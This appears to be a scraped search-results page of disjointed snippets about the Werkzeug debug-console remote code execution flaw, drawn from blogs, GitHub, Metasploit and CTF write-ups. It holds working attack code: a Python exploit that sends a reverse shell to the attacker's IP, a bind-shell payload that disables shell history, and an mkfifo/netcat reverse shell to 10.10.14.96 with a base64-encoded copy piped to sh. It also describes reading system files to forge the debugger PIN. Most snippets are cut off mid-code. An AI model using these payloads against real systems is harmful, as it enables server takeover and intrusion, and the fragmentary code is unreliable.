January 28, 2018 - #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%

Python script for exploiting Werkzeug Debug RCE useful for CTFs where you just need to read a particular file or execute some command.

Tested against the following Werkzeug versions: - 3.0.3 on Debian 12, Windows 11 and macOS 14.6 - 1.1.4 on Debian 12 - 1.0.1 on Debian 12 - 0.11.5 on Debian 12 - 0.10 on Debian 12 · h00die [email protected] Graeme Robinson metasploit ... To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced': ... The predictive window has collapsed. Exploitation follows disclosure in days.

People would say it's based on MSF exploit (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/werkzeug_debug_rce.rb), but as I couldn't understand at all this exploit, I did it my own exploit.

Security vulnerabilities and package health score for pip package werkzeug

GitHub - Ruulian/wconsole_extractor: WConsole Extractor is a python library which automatically exploits a Werkzeug development server in debug mode.

We cannot provide a description for this page right now

Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. - wdahlenburg/werkzeug-debug-conso...

December 4, 2022 - This module will exploit the Werkzeug debug console to put down a Python shell. This debugger "must never be used on production machines" but sometimes slips passed testing. Tested against: 0.9.6 on Debian 0.9.6 on Centos 0.10 on Debian

August 18, 2015 - ## # This module requires Metasploit: ... Debug Shell Command Execution', 'Description' => %q{ This module will exploit the Werkzeug debug console to put down a Python shell....

August 1, 2020 - Essentially what the exploit does is, it starts checking whether the debug shell is enabled or not, if it’s not it stops working, and if it is, it just sends a simple reverse shell code in python, pretty simple isn’t it ;)

Learn more about known Werkzeug 2.0.3 vulnerabilities and licenses detected.

payload = '''import os,pty,socket; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.bind(('%s',%s));s.listen(1);(rem, addr)=s.accept();os.dup2(rem.fileno(),0);'''\ · '''os.dup2(rem.fileno(),1);os.dup2(rem.fileno(),2);os.putenv("HISTFILE",'/dev/null');pty.spawn("/bin/bash");s.close();'''%(baseUrl,port)

February 18, 2020 - Flask is a micro web framework written in Python. It has become one of the most popular Python web application frameworks. Flask began as a wrapper around Jinja and Werkzeug. The vulnerability that we are going to discuss today is caused by Werkzeug.

To do that I build a python script. In this script you can see that I picked up the /proc/sys/kernel/randomize_va_space file which should be present on every modern linux systems and his contents (by default) is 2\n · $ cat /proc/sys/kernel/randomize_va_space | xxd 00000000: 320a 2. I exploited the RCE using blind-time-based technique to extract the flag.txt contents, but reading other writeup I notice that I can use a python reverse shell payload to get a shell on the server.

WConsole Extractor is a python library which automatically exploits a Werkzeug development server in debug mode.

We cannot provide a description for this page right now

Now, we can write a solve script to automatic the above exploit chains! #!/usr/bin/env python3 import requests import random import string from bs4 import BeautifulSoup from re import search, compile from PIL import Image, ImageDraw, ImageFont from io import BytesIO class Solver: def __init__(self, targetBaseUrl): self.targetBaseUrl = targetBaseUrl self.session = requests.session() self.REGISTER_PATH = f'{self.targetBaseUrl}/register' self.LOGIN_PATH = f'{self.targetBaseUrl}/login' self.EDIT_PROFILE_PATH = f'{self.targetBaseUrl}/edit_profile' self.SEND_FRIEND_REQUEST_PATH = f'{self.targetBaseU

May 5, 2024 - The debugger in affected versions of Werkzeug can allow an attacker to execute code on a developer's machine under some circumstances. This requires the attacker to get the developer to interact wi...

October 8, 2022 - rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.96 3333 >/tmp/fecho 'cm0gLWYgL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTAuMTQuOTYgMzMzMyA+L3RtcC9mCg==' | base64 -d | sh ... Replacing the values in the exploit by reading the MAC from /sys/class/net/eth0/address, boot-id from /proc/sys/kernel/random/boot_id and cgroup from /proc/self/cgroup also replacing the path to flask app , modname and the user running this flask app